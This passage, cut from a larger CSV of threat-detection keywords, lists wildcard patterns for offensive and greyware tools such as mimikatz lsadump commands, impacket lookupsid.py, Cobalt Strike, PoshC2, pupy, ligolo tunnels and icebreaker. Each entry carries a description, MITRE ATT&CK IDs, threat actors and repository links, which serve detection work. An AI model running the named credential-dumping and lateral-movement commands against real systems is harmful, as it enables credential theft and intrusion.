Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*localrelay_linux_amd64*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*locate password | more*","greyware_tool_keyword","locate","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*LocateBrc4Config*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*lochiccbgeohimldjooaakjllnafhaid*","greyware_tool_keyword","IP Unblock","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*lockless *.dat*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*LockLess.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Locksmith-main.zip*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*log4_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*log4shell*.nessus.org*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*log4shell.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*LoGiC.NET.exe*","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","483","75","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" +"*loginsight.thrift*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"*LogonTracer*","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","N/A","10","2469","445","2023-09-08T13:32:03Z","2017-11-24T06:07:49Z" +"*logs/Responder-Session.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*logs/ridenum.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*logs/shares-with-SCF.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*logs/theHarvester.py.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*logToBeaconLog*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*LOLBAS-Project*","offensive_tool_keyword","LOLBAS-Project","Living Off The Land Binaries and Scripts (and also Libraries) malicious use of legitimate tool","T1072 - T1059.003 - T1059.004 - T1059.001 - T1059.005 - T1564.001","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://lolbas-project.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LOLBins/NetLoader.xml*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*Londor.exe -t Coverage*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*Londor.exe -t Script*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*looCiprian/GC2-sheet*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*lookupsid.py -hashes :* *@* 0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*loot_memory.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*LordNoteworthy*","offensive_tool_keyword","Github Username","Github username of hacker known for malware pocs and windows exploitations","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*lotus2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Lovely-Potato*","offensive_tool_keyword","Lovely-Potato","Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM","T1055 - T1547.002 - T1543.003 - T1059.001","TA0004 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/TsukiCTF/Lovely-Potato","1","0","N/A","N/A","2","131","29","2021-07-21T18:09:14Z","2019-05-17T19:37:20Z" +"*lsa_decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*lsa_decryptor_nt*.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*lsa_secrets.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*lsadump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*lsadump::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::changentlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::dcshadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::dcsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::lsa*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::mbc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::netsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::packages*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::postzerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::RpData*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::sam*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::secrets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::setntlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::zerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - 